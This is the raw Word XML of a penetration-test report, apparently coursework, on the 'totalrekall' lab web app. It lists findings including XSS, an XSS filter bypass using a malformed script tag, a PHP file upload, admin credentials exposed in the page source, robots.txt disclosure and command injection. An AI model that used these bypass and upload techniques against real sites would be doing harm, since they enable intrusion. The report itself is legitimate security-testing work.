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fob9te">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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znysh7">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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et92p0">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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dy6vkm">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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s8eyo1">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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7dp8vu">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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rdcrjn">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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26in1rg">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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lnxbz9">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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5nkun2">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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44sinio">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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z337ya">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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3j2qqm3">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_1y810tw">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_4i7ojhp">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>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vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_2xcytpi">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SIKYU TECH</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3F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Steven Mercado</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1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Senior Penetration Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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B">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C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">30/06/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Steven Mercado</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Performed pen testing techniques against totalrekall web app.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pP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052">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="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53">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pP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056">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="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57">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pP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05A">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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For the testing, we focused on the following:</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2"/>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8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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A">
      <w:pPr>
        <w:ind w:firstLine="30"/>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Rekall has outlined the following objectives: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6">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7">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8">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9">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A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromise several machines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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82">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9">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B">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C">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1">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2">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3">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4">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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3545840"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Chart&#10;&#10;Description automatically generated with medium confidence" id="22" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Chart&#10;&#10;Description automatically generated with medium confidence" id="0" name="image12.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Input Validation: Certain fields effectively block basic JavaScript payload enclosed in ‘&lt;script&gt;&lt;/script&gt;’ tags. Advanced Cross-Site Scripting techniques are necessary to exploit these fields.</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SQL Injection Protection: The application is resilient to basic SQL injection methods.</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Robots.txt Configuration: The ‘robots.txt’ file is configured to disallow web crawlers from accessing admin-level data.</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4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation: Most input fields are vulnerable to  Cross-Site Scripting via script injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Inclusion Vulnerability: The VR Planner page is open to multiple file inclusion exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Issue: Admin credentials are exposed in the developer tools tab.</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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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[Provide a narrative summary of your steps and findings, including screenshots. It’s fine to mention specifics (e.g., used Metasploit to exploit a vulnerable version of DistCC), but do not get too technical in these specifics. This should be an A–Z summary of your assessment.]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SIKYU TECH successfully achieved most objectives outlined in the scope of work. We located and exfiltrated sensitive information, compromising various areas of the website and both Linux and Windows machines. However, we were unable to escalate access privileges within the allocated time.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Our tests revealed several vulnerabilities, primarily related to unauthorized data entry or upload on the website. These vulnerabilities could lead to the theft, alteration, or deletion of customer data. In one instance, administrative credentials were exposed through a command injection attack. Update needed on the Apache server allowed us to access user credential files from a Linux machine. Exploiting these vulnerabilities could cause significant financial and reputational damage to Rekall Corporation.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Additional findings include an exposed password hash on the public Rekall GitHub site, which we used to infiltrate a Windows 10 machine. Rekall’s outdated email technology also poses a vulnerability. We found website settings that could be exploited by online robots and recommend adjustments to mitigate these risks.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Details of each vulnerability and suggested mitigations are provided in the Vulnerability Findings section of our report. Thank you for the opportunity to conduct this test. Please contact us with any questions.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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Day 1: 30-06-2024 - Probing Totalrekall Web App</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Vulnerability 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Scripting (XSS) -  OWASP 7 Identification and Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="230.15999999999997" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="230.15999999999997" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We successfully inserted alert scripts into the input fields for "Begin by entering your name below" and "Comments" on the Welcome page, as well as the "Choose Your Character" field on the Memory Planner page using Cross-Site Scripting (XSS) Although the Memory Planner page had some input validation, we bypassed it with minor modifications, such as using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;SCRIPscriptT&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These vulnerabilities could allow an attacker to redirect customers to spoofed pages, install keyloggers, or capture cookies, leading to data theft and unauthorized system access.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19"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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI) -  OWASP 1 Broken Access Control, 2 Cryptographic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="230.15999999999997" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Failures, 5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We successfully uploaded a .php script file through the Memory Planner page's file upload area. Since .php files execute scripts on the back-end server, allowing their upload can lead to malicious scripts running against the database, potentially modifying or deleting data and causing system outages.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18"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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 3: Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We utilized Developer Tools to inspect the HTML structure of the login page, revealing admin credentials: dougquiad</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This method exposed sensitive login information, illustrating a significant security oversight that could lead to unauthorized access and compromise of the system.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5572125" cy="3228975"/>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5721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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 4: Exclusion Standard Setting Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We successfully appended "/robots.txt" to the end of the IP address, revealing the website's robots exclusion standard settings. Attackers could use the "disallow" information in this file as a guide to areas where they might attempt exploits.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 5: Command Injection</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A Command Injection Vulnerability was identified on the networking.php page, allowing us to access information about the types of SIEM, Firewall, and Load Balancers used in connection with the website. This exploit highlights potential risks associated with unauthorized access to critical infrastructure details, which could be leveraged by attackers to plan more targeted and damaging attacks.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 6: PII Data Exposure</w:t>
      </w:r>
    </w:p>
